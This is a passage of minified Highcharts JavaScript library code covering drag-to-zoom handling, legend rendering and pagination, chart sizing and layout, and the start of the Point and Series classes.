drag:function(a){var b=this.chart,c=b.options.chart,d=a.chartX,e=a.chartY,f=this.zoomHor,g=this.zoomVert,h=b.plotLeft,k=b.plotTop,l=b.plotWidth,m=b.plotHeight,n,q=this.mouseDownX,p=this.mouseDownY;d<h?d=h:d>h+l&&(d=h+l);e<k?e=k:e>k+m&&(e=k+m);this.hasDragged=Math.sqrt(Math.pow(q-d,2)+Math.pow(p-e,2));10<this.hasDragged&&(n=b.isInsidePlot(q-h,p-k),b.hasCartesianSeries&&(this.zoomX||this.zoomY)&&n&&!this.selectionMarker&&(this.selectionMarker=b.renderer.rect(h,k,f?1:l,g?1:m,0).attr({fill:c.selectionMarkerFill||
"rgba(69,114,167,0.25)",zIndex:7}).add()),this.selectionMarker&&f&&(d-=q,this.selectionMarker.attr({width:R(d),x:(0<d?0:d)+q})),this.selectionMarker&&g&&(d=e-p,this.selectionMarker.attr({height:R(d),y:(0<d?0:d)+p})),n&&!this.selectionMarker&&c.panning&&b.pan(a,c.panning))},drop:function(a){var b=this.chart,c=this.hasPinched;if(this.selectionMarker){var d={xAxis:[],yAxis:[],originalEvent:a.originalEvent||a};a=this.selectionMarker;var e=a.attr?a.attr("x"):a.x,f=a.attr?a.attr("y"):a.y,g=a.attr?a.attr("width"):
a.width,h=a.attr?a.attr("height"):a.height,k;if(this.hasDragged||c)s(b.axes,function(a){if(a.zoomEnabled){var b=a.horiz,c=a.toValue(b?e:f),b=a.toValue(b?e+g:f+h);isNaN(c)||isNaN(b)||(d[a.coll].push({axis:a,min:J(c,b),max:x(c,b)}),k=!0)}}),k&&C(b,"selection",d,function(a){b.zoom(t(a,c?{animation:!1}:null))});this.selectionMarker=this.selectionMarker.destroy();c&&this.scaleGroups()}b&&(X(b.container,{cursor:b._cursor}),b.cancelClick=10<this.hasDragged,b.mouseIsDown=this.hasDragged=this.hasPinched=!1,
this.pinchDown=[])},onContainerMouseDown:function(a){a=this.normalize(a);a.preventDefault&&a.preventDefault();this.dragStart(a)},onDocumentMouseUp:function(a){Y[Ca]&&Y[Ca].pointer.drop(a)},onDocumentMouseMove:function(a){var b=this.chart,c=this.chartPosition,d=b.hoverSeries;a=this.normalize(a,c);c&&d&&!this.inClass(a.target,"highcharts-tracker")&&!b.isInsidePlot(a.chartX-b.plotLeft,a.chartY-b.plotTop)&&this.reset()},onContainerMouseLeave:function(){var a=Y[Ca];a&&(a.pointer.reset(),a.pointer.chartPosition=
null)},onContainerMouseMove:function(a){var b=this.chart;Ca=b.index;a=this.normalize(a);"mousedown"===b.mouseIsDown&&this.drag(a);!this.inClass(a.target,"highcharts-tracker")&&!b.isInsidePlot(a.chartX-b.plotLeft,a.chartY-b.plotTop)||b.openMenu||this.runPointActions(a)},inClass:function(a,b){for(var c;a;){if(c=G(a,"class")){if(-1!==c.indexOf(b))return!0;if(-1!==c.indexOf("highcharts-container"))return!1}a=a.parentNode}},onTrackerMouseOut:function(a){var b=this.chart.hoverSeries,c=(a=a.relatedTarget||
a.toElement)&&a.point&&a.point.series;if(b&&!b.options.stickyTracking&&!this.inClass(a,"highcharts-tooltip")&&c!==b)b.onMouseOut()},onContainerClick:function(a){var b=this.chart,c=b.hoverPoint,d=b.plotLeft,e=b.plotTop;a=this.normalize(a);a.cancelBubble=!0;b.cancelClick||(c&&this.inClass(a.target,"highcharts-tracker")?(C(c.series,"click",t(a,{point:c})),b.hoverPoint&&c.firePointEvent("click",a)):(t(a,this.getCoordinates(a)),b.isInsidePlot(a.chartX-d,a.chartY-e)&&C(b,"click",a)))},setDOMEvents:function(){var a=
this,b=a.chart.container;b.onmousedown=function(b){a.onContainerMouseDown(b)};b.onmousemove=function(b){a.onContainerMouseMove(b)};b.onclick=function(b){a.onContainerClick(b)};N(b,"mouseleave",a.onContainerMouseLeave);1===Ha&&N(y,"mouseup",a.onDocumentMouseUp);Ga&&(b.ontouchstart=function(b){a.onContainerTouchStart(b)},b.ontouchmove=function(b){a.onContainerTouchMove(b)},1===Ha&&N(y,"touchend",a.onDocumentTouchEnd))},destroy:function(){var a;T(this.chart.container,"mouseleave",this.onContainerMouseLeave);
Ha||(T(y,"mouseup",this.onDocumentMouseUp),T(y,"touchend",this.onDocumentTouchEnd));clearInterval(this.tooltipTimeout);for(a in this)this[a]=null}};var $a=S.Legend=function(a,b){this.init(a,b)};$a.prototype={init:function(a,b){var c=this,d=b.itemStyle,e=r(b.padding,8),f=b.itemMarginTop||0;this.options=b;b.enabled&&(c.baseline=A(d.fontSize)+3+f,c.itemStyle=d,c.itemHiddenStyle=E(d,b.itemHiddenStyle),c.itemMarginTop=f,c.padding=e,c.initialItemX=e,c.initialItemY=e-5,c.maxItemWidth=0,c.chart=a,c.itemHeight=
0,c.lastLineHeight=0,c.symbolWidth=r(b.symbolWidth,16),c.pages=[],c.render(),N(c.chart,"endResize",function(){c.positionCheckboxes()}))},colorizeItem:function(a,b){var c=this.options,d=a.legendItem,e=a.legendLine,f=a.legendSymbol,g=this.itemHiddenStyle.color,c=b?c.itemStyle.color:g,h=b?a.legendColor||a.color||"#CCC":g,g=a.options&&a.options.marker,k={fill:h},l;d&&d.css({fill:c,color:c});e&&e.attr({stroke:h});if(f){if(g&&f.isMarker)for(l in k.stroke=h,g=a.convertAttribs(g),g)d=g[l],d!==v&&(k[l]=d);
f.attr(k)}},positionItem:function(a){var b=this.options,c=b.symbolPadding,b=!b.rtl,d=a._legendItemPos,e=d[0],d=d[1],f=a.checkbox;a.legendGroup&&a.legendGroup.translate(b?e:this.legendWidth-e-2*c-4,d);f&&(f.x=e,f.y=d)},destroyItem:function(a){var b=a.checkbox;s(["legendItem","legendLine","legendSymbol","legendGroup"],function(b){a[b]&&(a[b]=a[b].destroy())});b&&La(a.checkbox)},destroy:function(){var a=this.group,b=this.box;b&&(this.box=b.destroy());a&&(this.group=a.destroy())},positionCheckboxes:function(a){var b=
this.group.alignAttr,c,d=this.clipHeight||this.legendHeight;b&&(c=b.translateY,s(this.allItems,function(e){var f=e.checkbox,g;f&&(g=c+f.y+(a||0)+3,X(f,{left:b.translateX+e.checkboxOffset+f.x-20+"px",top:g+"px",display:g>c-6&&g<c+d-6?"":ca}))}))},renderTitle:function(){var a=this.padding,b=this.options.title,c=0;b.text&&(this.title||(this.title=this.chart.renderer.label(b.text,a-3,a-4,null,null,null,null,null,"legend-title").attr({zIndex:1}).css(b.style).add(this.group)),a=this.title.getBBox(),c=a.height,
this.offsetWidth=a.width,this.contentGroup.attr({translateY:c}));this.titleHeight=c},renderItem:function(a){var b=this.chart,c=b.renderer,d=this.options,e="horizontal"===d.layout,f=this.symbolWidth,g=d.symbolPadding,h=this.itemStyle,k=this.itemHiddenStyle,l=this.padding,m=e?r(d.itemDistance,20):0,n=!d.rtl,q=d.width,p=d.itemMarginBottom||0,w=this.itemMarginTop,s=this.initialItemX,u=a.legendItem,t=a.series&&a.series.drawLegendSymbol?a.series:a,v=t.options,v=this.createCheckboxForItem&&v&&v.showCheckbox,
y=d.useHTML;u||(a.legendGroup=c.g("legend-item").attr({zIndex:1}).add(this.scrollGroup),t.drawLegendSymbol(this,a),a.legendItem=u=c.text(d.labelFormat?ua(d.labelFormat,a):d.labelFormatter.call(a),n?f+g:-g,this.baseline,y).css(E(a.visible?h:k)).attr({align:n?"left":"right",zIndex:2}).add(a.legendGroup),this.setItemEvents&&this.setItemEvents(a,u,y,h,k),this.colorizeItem(a,a.visible),v&&this.createCheckboxForItem(a));c=u.getBBox();f=a.checkboxOffset=d.itemWidth||a.legendItemWidth||f+g+c.width+m+(v?20:
0);this.itemHeight=g=z(a.legendItemHeight||c.height);e&&this.itemX-s+f>(q||b.chartWidth-2*l-s-d.x)&&(this.itemX=s,this.itemY+=w+this.lastLineHeight+p,this.lastLineHeight=0);this.maxItemWidth=x(this.maxItemWidth,f);this.lastItemY=w+this.itemY+p;this.lastLineHeight=x(g,this.lastLineHeight);a._legendItemPos=[this.itemX,this.itemY];e?this.itemX+=f:(this.itemY+=w+g+p,this.lastLineHeight=g);this.offsetWidth=q||x((e?this.itemX-s-m:f)+l,this.offsetWidth)},getAllItems:function(){var a=[];s(this.chart.series,
function(b){var c=b.options;r(c.showInLegend,u(c.linkedTo)?!1:v,!0)&&(a=a.concat(b.legendItems||("point"===c.legendType?b.data:b)))});return a},render:function(){var a=this,b=a.chart,c=b.renderer,d=a.group,e,f,g,h,k=a.box,l=a.options,m=a.padding,n=l.borderWidth,q=l.backgroundColor;a.itemX=a.initialItemX;a.itemY=a.initialItemY;a.offsetWidth=0;a.lastItemY=0;d||(a.group=d=c.g("legend").attr({zIndex:7}).add(),a.contentGroup=c.g().attr({zIndex:1}).add(d),a.scrollGroup=c.g().add(a.contentGroup));a.renderTitle();
e=a.getAllItems();fb(e,function(a,b){return(a.options&&a.options.legendIndex||0)-(b.options&&b.options.legendIndex||0)});l.reversed&&e.reverse();a.allItems=e;a.display=f=!!e.length;s(e,function(b){a.renderItem(b)});g=l.width||a.offsetWidth;h=a.lastItemY+a.lastLineHeight+a.titleHeight;h=a.handleOverflow(h);if(n||q)g+=m,h+=m,k?0<g&&0<h&&(k[k.isNew?"attr":"animate"](k.crisp({width:g,height:h})),k.isNew=!1):(a.box=k=c.rect(0,0,g,h,l.borderRadius,n||0).attr({stroke:l.borderColor,"stroke-width":n||0,fill:q||
ca}).add(d).shadow(l.shadow),k.isNew=!0),k[f?"show":"hide"]();a.legendWidth=g;a.legendHeight=h;s(e,function(b){a.positionItem(b)});f&&d.align(t({width:g,height:h},l),!0,"spacingBox");b.isResizing||this.positionCheckboxes()},handleOverflow:function(a){var b=this,c=this.chart,d=c.renderer,e=this.options,f=e.y,f=c.spacingBox.height+("top"===e.verticalAlign?-f:f)-this.padding,g=e.maxHeight,h,k=this.clipRect,l=e.navigation,m=r(l.animation,!0),n=l.arrowSize||12,q=this.nav,p=this.pages,w,u=this.allItems;
"horizontal"===e.layout&&(f/=2);g&&(f=J(f,g));p.length=0;a>f&&!e.useHTML?(this.clipHeight=h=f-20-this.titleHeight-this.padding,this.currentPage=r(this.currentPage,1),this.fullHeight=a,s(u,function(a,b){var c=a._legendItemPos[1],d=z(a.legendItem.getBBox().height),e=p.length;if(!e||c-p[e-1]>h&&(w||c)!==p[e-1])p.push(w||c),e++;b===u.length-1&&c+d-p[e-1]>h&&p.push(c);c!==w&&(w=c)}),k||(k=b.clipRect=d.clipRect(0,this.padding,9999,0),b.contentGroup.clip(k)),k.attr({height:h}),q||(this.nav=q=d.g().attr({zIndex:1}).add(this.group),
this.up=d.symbol("triangle",0,0,n,n).on("click",function(){b.scroll(-1,m)}).add(q),this.pager=d.text("",15,10).css(l.style).add(q),this.down=d.symbol("triangle-down",0,0,n,n).on("click",function(){b.scroll(1,m)}).add(q)),b.scroll(0),a=f):q&&(k.attr({height:c.chartHeight}),q.hide(),this.scrollGroup.attr({translateY:1}),this.clipHeight=0);return a},scroll:function(a,b){var c=this.pages,d=c.length,e=this.currentPage+a,f=this.clipHeight,g=this.options.navigation,h=g.activeColor,g=g.inactiveColor,k=this.pager,
l=this.padding;e>d&&(e=d);0<e&&(b!==v&&(ea=r(b,this.chart.animation)),this.nav.attr({translateX:l,translateY:f+this.padding+7+this.titleHeight,visibility:"visible"}),this.up.attr({fill:1===e?g:h}).css({cursor:1===e?"default":"pointer"}),k.attr({text:e+"/"+d}),this.down.attr({x:18+this.pager.getBBox().width,fill:e===d?g:h}).css({cursor:e===d?"default":"pointer"}),c=-c[e-1]+this.initialItemY,this.scrollGroup.animate({translateY:c}),this.currentPage=e,this.positionCheckboxes(c))}};var Vb=S.LegendSymbolMixin=
{drawRectangle:function(a,b){var c=a.options.symbolHeight||12;b.legendSymbol=this.chart.renderer.rect(0,a.baseline-5-c/2,a.symbolWidth,c,a.options.symbolRadius||0).attr({zIndex:3}).add(b.legendGroup)},drawLineMarker:function(a){var b=this.options,c=b.marker,d;d=a.symbolWidth;var e=this.chart.renderer,f=this.legendGroup;a=a.baseline-z(0.3*e.fontMetrics(a.options.itemStyle.fontSize).b);var g;b.lineWidth&&(g={"stroke-width":b.lineWidth},b.dashStyle&&(g.dashstyle=b.dashStyle),this.legendLine=e.path(["M",
0,a,"L",d,a]).attr(g).add(f));c&&!1!==c.enabled&&(b=c.radius,this.legendSymbol=d=e.symbol(this.symbol,d/2-b,a-b,2*b,2*b).add(f),d.isMarker=!0)}};(/Trident\/7\.0/.test(ma)||Sa)&&cb($a.prototype,"positionItem",function(a,b){var c=this,d=function(){b._legendItemPos&&a.call(c,b)};d();setTimeout(d)});Qa.prototype={init:function(a,b){var c,d=a.series;a.series=null;c=E(I,a);c.series=a.series=d;this.userOptions=a;d=c.chart;this.margin=this.splashArray("margin",d);this.spacing=this.splashArray("spacing",d);
var e=d.events;this.bounds={h:{},v:{}};this.callback=b;this.isResizing=0;this.options=c;this.axes=[];this.series=[];this.hasCartesianSeries=d.showAxes;var f=this,g;f.index=Y.length;Y.push(f);Ha++;!1!==d.reflow&&N(f,"load",function(){f.initReflow()});if(e)for(g in e)N(f,g,e[g]);f.xAxis=[];f.yAxis=[];f.animation=da?!1:r(d.animation,!0);f.pointCount=0;f.counters=new sb;f.firstRender()},initSeries:function(a){var b=this.options.chart;(b=M[a.type||b.type||b.defaultSeriesType])||fa(17,!0);b=new b;b.init(this,
a);return b},isInsidePlot:function(a,b,c){var d=c?b:a;a=c?a:b;return 0<=d&&d<=this.plotWidth&&0<=a&&a<=this.plotHeight},adjustTickAmounts:function(){!1!==this.options.chart.alignTicks&&s(this.axes,function(a){a.adjustTickAmount()});this.maxTicks=null},redraw:function(a){var b=this.axes,c=this.series,d=this.pointer,e=this.legend,f=this.isDirtyLegend,g,h,k=this.isDirtyBox,l=c.length,m=l,n=this.renderer,q=n.isHidden(),p=[];ea=r(a,this.animation);q&&this.cloneRenderTo();for(this.layOutTitles();m--;)if(a=
c[m],a.options.stacking&&(g=!0,a.isDirty)){h=!0;break}if(h)for(m=l;m--;)a=c[m],a.options.stacking&&(a.isDirty=!0);s(c,function(a){a.isDirty&&"point"===a.options.legendType&&(f=!0)});f&&e.options.enabled&&(e.render(),this.isDirtyLegend=!1);g&&this.getStacks();this.hasCartesianSeries&&(this.isResizing||(this.maxTicks=null,s(b,function(a){a.setScale()})),this.adjustTickAmounts(),this.getMargins(),s(b,function(a){a.isDirty&&(k=!0)}),s(b,function(a){a.isDirtyExtremes&&(a.isDirtyExtremes=!1,p.push(function(){C(a,
"afterSetExtremes",t(a.eventArgs,a.getExtremes()));delete a.eventArgs}));(k||g)&&a.redraw()}));k&&this.drawChartBox();s(c,function(a){a.isDirty&&a.visible&&(!a.isCartesian||a.xAxis)&&a.redraw()});d&&d.reset(!0);n.draw();C(this,"redraw");q&&this.cloneRenderTo(!0);s(p,function(a){a.call()})},get:function(a){var b=this.axes,c=this.series,d,e;for(d=0;d<b.length;d++)if(b[d].options.id===a)return b[d];for(d=0;d<c.length;d++)if(c[d].options.id===a)return c[d];for(d=0;d<c.length;d++)for(e=c[d].points||[],
b=0;b<e.length;b++)if(e[b].id===a)return e[b];return null},getAxes:function(){var a=this,b=this.options,c=b.xAxis=ha(b.xAxis||{}),b=b.yAxis=ha(b.yAxis||{});s(c,function(a,b){a.index=b;a.isX=!0});s(b,function(a,b){a.index=b});c=c.concat(b);s(c,function(b){new sa(a,b)});a.adjustTickAmounts()},getSelectedPoints:function(){var a=[];s(this.series,function(b){a=a.concat(mb(b.points||[],function(a){return a.selected}))});return a},getSelectedSeries:function(){return mb(this.series,function(a){return a.selected})},
getStacks:function(){var a=this;s(a.yAxis,function(a){a.stacks&&a.hasVisibleSeries&&(a.oldStacks=a.stacks)});s(a.series,function(b){!b.options.stacking||!0!==b.visible&&!1!==a.options.chart.ignoreHiddenSeries||(b.stackKey=b.type+r(b.options.stack,""))})},setTitle:function(a,b,c){var d=this,e=d.options,f;f=e.title=E(e.title,a);e=e.subtitle=E(e.subtitle,b);s([["title",a,f],["subtitle",b,e]],function(a){var b=a[0],c=d[b],e=a[1];a=a[2];c&&e&&(d[b]=c=c.destroy());a&&a.text&&!c&&(d[b]=d.renderer.text(a.text,
0,0,a.useHTML).attr({align:a.align,"class":"highcharts-"+b,zIndex:a.zIndex||4}).css(a.style).add())});d.layOutTitles(c)},layOutTitles:function(a){var b=0,c=this.title,d=this.subtitle,e=this.options,f=e.title,e=e.subtitle,g=this.spacingBox.width-44;c&&(c.css({width:(f.width||g)+"px"}).align(t({y:15},f),!1,"spacingBox"),f.floating||f.verticalAlign||(b=c.getBBox().height));d&&(d.css({width:(e.width||g)+"px"}).align(t({y:b+f.margin},e),!1,"spacingBox"),e.floating||e.verticalAlign||(b=ya(b+d.getBBox().height)));
c=this.titleOffset!==b;this.titleOffset=b;!this.isDirtyBox&&c&&(this.isDirtyBox=c,this.hasRendered&&r(a,!0)&&this.isDirtyBox&&this.redraw())},getChartSize:function(){var a=this.options.chart,b=a.width,a=a.height,c=this.renderToClone||this.renderTo;u(b)||(this.containerWidth=Va(c,"width"));u(a)||(this.containerHeight=Va(c,"height"));this.chartWidth=x(0,b||this.containerWidth||600);this.chartHeight=x(0,r(a,19<this.containerHeight?this.containerHeight:400))},cloneRenderTo:function(a){var b=this.renderToClone,
c=this.container;a?b&&(this.renderTo.appendChild(c),La(b),delete this.renderToClone):(c&&c.parentNode===this.renderTo&&this.renderTo.removeChild(c),this.renderToClone=b=this.renderTo.cloneNode(0),X(b,{position:"absolute",top:"-9999px",display:"block"}),b.style.setProperty&&b.style.setProperty("display","block","important"),y.body.appendChild(b),c&&b.appendChild(c))},getContainer:function(){var a,b=this.options.chart,c,d,e;this.renderTo=a=b.renderTo;e="highcharts-"+kb++;U(a)&&(this.renderTo=a=y.getElementById(a));
a||fa(13,!0);c=A(G(a,"data-highcharts-chart"));!isNaN(c)&&Y[c]&&Y[c].hasRendered&&Y[c].destroy();G(a,"data-highcharts-chart",this.index);a.innerHTML="";b.skipClone||a.offsetWidth||this.cloneRenderTo();this.getChartSize();c=this.chartWidth;d=this.chartHeight;this.container=a=ta(tb,{className:"highcharts-container"+(b.className?" "+b.className:""),id:e},t({position:"relative",overflow:"hidden",width:c+"px",height:d+"px",textAlign:"left",lineHeight:"normal",zIndex:0,"-webkit-tap-highlight-color":"rgba(0,0,0,0)"},
b.style),this.renderToClone||a);this._cursor=a.style.cursor;this.renderer=b.forExport?new Za(a,c,d,b.style,!0):new Ta(a,c,d,b.style);da&&this.renderer.create(this,a,c,d)},getMargins:function(){var a=this.spacing,b,c=this.legend,d=this.margin,e=this.options.legend,f=r(e.margin,20),g=e.x,h=e.y,k=e.align,l=e.verticalAlign,m=this.titleOffset;this.resetMargins();b=this.axisOffset;m&&!u(d[0])&&(this.plotTop=x(this.plotTop,m+this.options.title.margin+a[0]));c.display&&!e.floating&&("right"===k?u(d[1])||
(this.marginRight=x(this.marginRight,c.legendWidth-g+f+a[1])):"left"===k?u(d[3])||(this.plotLeft=x(this.plotLeft,c.legendWidth+g+f+a[3])):"top"===l?u(d[0])||(this.plotTop=x(this.plotTop,c.legendHeight+h+f+a[0])):"bottom"!==l||u(d[2])||(this.marginBottom=x(this.marginBottom,c.legendHeight-h+f+a[2])));this.extraBottomMargin&&(this.marginBottom+=this.extraBottomMargin);this.extraTopMargin&&(this.plotTop+=this.extraTopMargin);this.hasCartesianSeries&&s(this.axes,function(a){a.getOffset()});u(d[3])||(this.plotLeft+=
b[3]);u(d[0])||(this.plotTop+=b[0]);u(d[2])||(this.marginBottom+=b[2]);u(d[1])||(this.marginRight+=b[1]);this.setChartSize()},reflow:function(a){var b=this,c=b.options.chart,d=b.renderTo,e=c.width||Va(d,"width"),f=c.height||Va(d,"height"),c=a?a.target:O,d=function(){b.container&&(b.setSize(e,f,!1),b.hasUserSize=null)};if(!b.hasUserSize&&e&&f&&(c===O||c===y)){if(e!==b.containerWidth||f!==b.containerHeight)clearTimeout(b.reflowTimeout),a?b.reflowTimeout=setTimeout(d,100):d();b.containerWidth=e;b.containerHeight=
f}},initReflow:function(){var a=this,b=function(b){a.reflow(b)};N(O,"resize",b);N(a,"destroy",function(){T(O,"resize",b)})},setSize:function(a,b,c){var d=this,e,f,g;d.isResizing+=1;g=function(){d&&C(d,"endResize",null,function(){d.isResizing-=1})};ea=r(c,d.animation);d.oldChartHeight=d.chartHeight;d.oldChartWidth=d.chartWidth;u(a)&&(d.chartWidth=e=x(0,z(a)),d.hasUserSize=!!e);u(b)&&(d.chartHeight=f=x(0,z(b)));(ea?Eb:X)(d.container,{width:e+"px",height:f+"px"},ea);d.setChartSize(!0);d.renderer.setSize(e,
f,c);d.maxTicks=null;s(d.axes,function(a){a.isDirty=!0;a.setScale()});s(d.series,function(a){a.isDirty=!0});d.isDirtyLegend=!0;d.isDirtyBox=!0;d.layOutTitles();d.getMargins();d.redraw(c);d.oldChartHeight=null;C(d,"resize");!1===ea?g():setTimeout(g,ea&&ea.duration||500)},setChartSize:function(a){var b=this.inverted,c=this.renderer,d=this.chartWidth,e=this.chartHeight,f=this.options.chart,g=this.spacing,h=this.clipOffset,k,l,m,n;this.plotLeft=k=z(this.plotLeft);this.plotTop=l=z(this.plotTop);this.plotWidth=
m=x(0,z(d-k-this.marginRight));this.plotHeight=n=x(0,z(e-l-this.marginBottom));this.plotSizeX=b?n:m;this.plotSizeY=b?m:n;this.plotBorderWidth=f.plotBorderWidth||0;this.spacingBox=c.spacingBox={x:g[3],y:g[0],width:d-g[3]-g[1],height:e-g[0]-g[2]};this.plotBox=c.plotBox={x:k,y:l,width:m,height:n};d=2*F(this.plotBorderWidth/2);b=ya(x(d,h[3])/2);c=ya(x(d,h[0])/2);this.clipBox={x:b,y:c,width:F(this.plotSizeX-x(d,h[1])/2-b),height:F(this.plotSizeY-x(d,h[2])/2-c)};a||s(this.axes,function(a){a.setAxisSize();
a.setAxisTranslation()})},resetMargins:function(){var a=this.spacing,b=this.margin;this.plotTop=r(b[0],a[0]);this.marginRight=r(b[1],a[1]);this.marginBottom=r(b[2],a[2]);this.plotLeft=r(b[3],a[3]);this.axisOffset=[0,0,0,0];this.clipOffset=[0,0,0,0]},drawChartBox:function(){var a=this.options.chart,b=this.renderer,c=this.chartWidth,d=this.chartHeight,e=this.chartBackground,f=this.plotBackground,g=this.plotBorder,h=this.plotBGImage,k=a.borderWidth||0,l=a.backgroundColor,m=a.plotBackgroundColor,n=a.plotBackgroundImage,
q=a.plotBorderWidth||0,p,r=this.plotLeft,s=this.plotTop,u=this.plotWidth,t=this.plotHeight,v=this.plotBox,x=this.clipRect,z=this.clipBox;p=k+(a.shadow?8:0);if(k||l)e?e.animate(e.crisp({width:c-p,height:d-p})):(e={fill:l||ca},k&&(e.stroke=a.borderColor,e["stroke-width"]=k),this.chartBackground=b.rect(p/2,p/2,c-p,d-p,a.borderRadius,k).attr(e).addClass("highcharts-background").add().shadow(a.shadow));m&&(f?f.animate(v):this.plotBackground=b.rect(r,s,u,t,0).attr({fill:m}).add().shadow(a.plotShadow));
n&&(h?h.animate(v):this.plotBGImage=b.image(n,r,s,u,t).add());x?x.animate({width:z.width,height:z.height}):this.clipRect=b.clipRect(z);q&&(g?g.animate(g.crisp({x:r,y:s,width:u,height:t})):this.plotBorder=b.rect(r,s,u,t,0,-q).attr({stroke:a.plotBorderColor,"stroke-width":q,fill:ca,zIndex:1}).add());this.isDirtyBox=!1},propFromSeries:function(){var a=this,b=a.options.chart,c,d=a.options.series,e,f;s(["inverted","angular","polar"],function(g){c=M[b.type||b.defaultSeriesType];f=a[g]||b[g]||c&&c.prototype[g];
for(e=d&&d.length;!f&&e--;)(c=M[d[e].type])&&c.prototype[g]&&(f=!0);a[g]=f})},linkSeries:function(){var a=this,b=a.series;s(b,function(a){a.linkedSeries.length=0});s(b,function(b){var d=b.options.linkedTo;U(d)&&(d=":previous"===d?a.series[b.index-1]:a.get(d))&&(d.linkedSeries.push(b),b.linkedParent=d)})},renderSeries:function(){s(this.series,function(a){a.translate();a.setTooltipPoints&&a.setTooltipPoints();a.render()})},render:function(){var a=this,b=a.axes,c=a.renderer,d=a.options,e=d.labels,f=
d.credits,g;a.setTitle();a.legend=new $a(a,d.legend);a.getStacks();s(b,function(a){a.setScale()});a.getMargins();a.maxTicks=null;s(b,function(a){a.setTickPositions(!0);a.setMaxTicks()});a.adjustTickAmounts();a.getMargins();a.drawChartBox();a.hasCartesianSeries&&s(b,function(a){a.render()});a.seriesGroup||(a.seriesGroup=c.g("series-group").attr({zIndex:3}).add());a.renderSeries();e.items&&s(e.items,function(b){var d=t(e.style,b.style),f=A(d.left)+a.plotLeft,g=A(d.top)+a.plotTop+12;delete d.left;delete d.top;
c.text(b.html,f,g).attr({zIndex:2}).css(d).add()});f.enabled&&!a.credits&&(g=f.href,a.credits=c.text(f.text,0,0).on("click",function(){g&&(location.href=g)}).attr({align:f.position.align,zIndex:8}).css(f.style).add().align(f.position));a.hasRendered=!0},destroy:function(){var a=this,b=a.axes,c=a.series,d=a.container,e,f=d&&d.parentNode;C(a,"destroy");Y[a.index]=v;Ha--;a.renderTo.removeAttribute("data-highcharts-chart");T(a);for(e=b.length;e--;)b[e]=b[e].destroy();for(e=c.length;e--;)c[e]=c[e].destroy();
s("title subtitle chartBackground plotBackground plotBGImage plotBorder seriesGroup clipRect credits pointer scroller rangeSelector legend resetZoomButton tooltip renderer".split(" "),function(b){var c=a[b];c&&c.destroy&&(a[b]=c.destroy())});d&&(d.innerHTML="",T(d),f&&La(d));for(e in a)delete a[e]},isReadyToRender:function(){var a=this;return!ba&&O==O.top&&"complete"!==y.readyState||da&&!O.canvg?(da?Gb.push(function(){a.firstRender()},a.options.global.canvasToolsURL):y.attachEvent("onreadystatechange",
function(){y.detachEvent("onreadystatechange",a.firstRender);"complete"===y.readyState&&a.firstRender()}),!1):!0},firstRender:function(){var a=this,b=a.options,c=a.callback;a.isReadyToRender()&&(a.getContainer(),C(a,"init"),a.resetMargins(),a.setChartSize(),a.propFromSeries(),a.getAxes(),s(b.series||[],function(b){a.initSeries(b)}),a.linkSeries(),C(a,"beforeRender"),S.Pointer&&(a.pointer=new Ib(a,b)),a.render(),a.renderer.draw(),c&&c.apply(a,[a]),s(a.callbacks,function(b){b.apply(a,[a])}),a.cloneRenderTo(!0),
C(a,"load"))},splashArray:function(a,b){var c=b[a],c=V(c)?c:[c,c,c,c];return[r(b[a+"Top"],c[0]),r(b[a+"Right"],c[1]),r(b[a+"Bottom"],c[2]),r(b[a+"Left"],c[3])]}};Qa.prototype.callbacks=[];var Ja=function(){};Ja.prototype={init:function(a,b,c){this.series=a;this.applyOptions(b,c);this.pointAttr={};a.options.colorByPoint&&(b=a.options.colors||a.chart.options.colors,this.color=this.color||b[a.colorCounter++],a.colorCounter===b.length&&(a.colorCounter=0));a.chart.pointCount++;return this},applyOptions:function(a,
b){var c=this.series,d=c.pointValKey;a=Ja.prototype.optionsToObject.call(this,a);t(this,a);this.options=this.options?t(this.options,a):a;d&&(this.y=this[d]);this.x===v&&c&&(this.x=b===v?c.autoIncrement():b);return this},optionsToObject:function(a){var b={},c=this.series,d=c.pointArrayMap||["y"],e=d.length,f=0,g=0;if("number"===typeof a||null===a)b[d[0]]=a;else if(ka(a))for(a.length>e&&(c=typeof a[0],"string"===c?b.name=a[0]:"number"===c&&(b.x=a[0]),f++);g<e;)b[d[g++]]=a[f++];else"object"===typeof a&&
(b=a,a.dataLabels&&(c._hasPointLabels=!0),a.marker&&(c._hasPointMarkers=!0));return b},destroy:function(){var a=this.series.chart,b=a.hoverPoints,c;a.pointCount--;b&&(this.setState(),oa(b,this),b.length||(a.hoverPoints=null));if(this===a.hoverPoint)this.onMouseOut();if(this.graphic||this.dataLabel)T(this),this.destroyElements();this.legendItem&&a.legend.destroyItem(this);for(c in this)this[c]=null},destroyElements:function(){for(var a="graphic dataLabel dataLabelUpper group connector shadowGroup".split(" "),
b,c=6;c--;)b=a[c],this[b]&&(this[b]=this[b].destroy())},getLabelConfig:function(){return{x:this.category,y:this.y,key:this.name||this.category,series:this.series,point:this,percentage:this.percentage,total:this.total||this.stackTotal}},tooltipFormatter:function(a){var b=this.series,c=b.tooltipOptions,d=r(c.valueDecimals,""),e=c.valuePrefix||"",f=c.valueSuffix||"";s(b.pointArrayMap||["y"],function(b){b="{point."+b;if(e||f)a=a.replace(b+"}",e+b+"}"+f);a=a.replace(b+"}",b+":,."+d+"f}")});return ua(a,
{point:this,series:this.series})},firePointEvent:function(a,b,c){var d=this,e=this.series.options;(e.point.events[a]||d.options&&d.options.events&&d.options.events[a])&&this.importEvents();"click"===a&&e.allowPointSelect&&(c=function(a){d.select(null,a.ctrlKey||a.metaKey||a.shiftKey)});C(this,a,b,c)}};var ga=function(){};ga.prototype={isCartesian:!0,type:"line",pointClass:Ja,sorted:!0,requireSorting:!0,pointAttrToOptions:{stroke:"lineColor","stroke-width":"lineWidth",fill:"fillColor",r:"radius"},
axisTypes:["xAxis","yAxis"],colorCounter:0,parallelArrays:["x","y"],init:function(a,b){var c=this,d,e,f=a.series,g=function(a,b){return r(a.options.index,a._i)-r(b.options.index,b._i)};c.chart=a;c.options=b=c.setOptions(b);c.linkedSeries=[];c.bindAxes();t(c,{name:b.name,state:"",pointAttr:{},visible:!1!==b.visible,selected:!0===b.selected});da&&(b.animation=!1);e=b.events;for(d in e)N(c,d,e[d]);if(e&&e.click||b.point&&b.point.events&&b.point.events.click||b.allowPointSelect)a.runTrackerClick=!0;c.getColor();
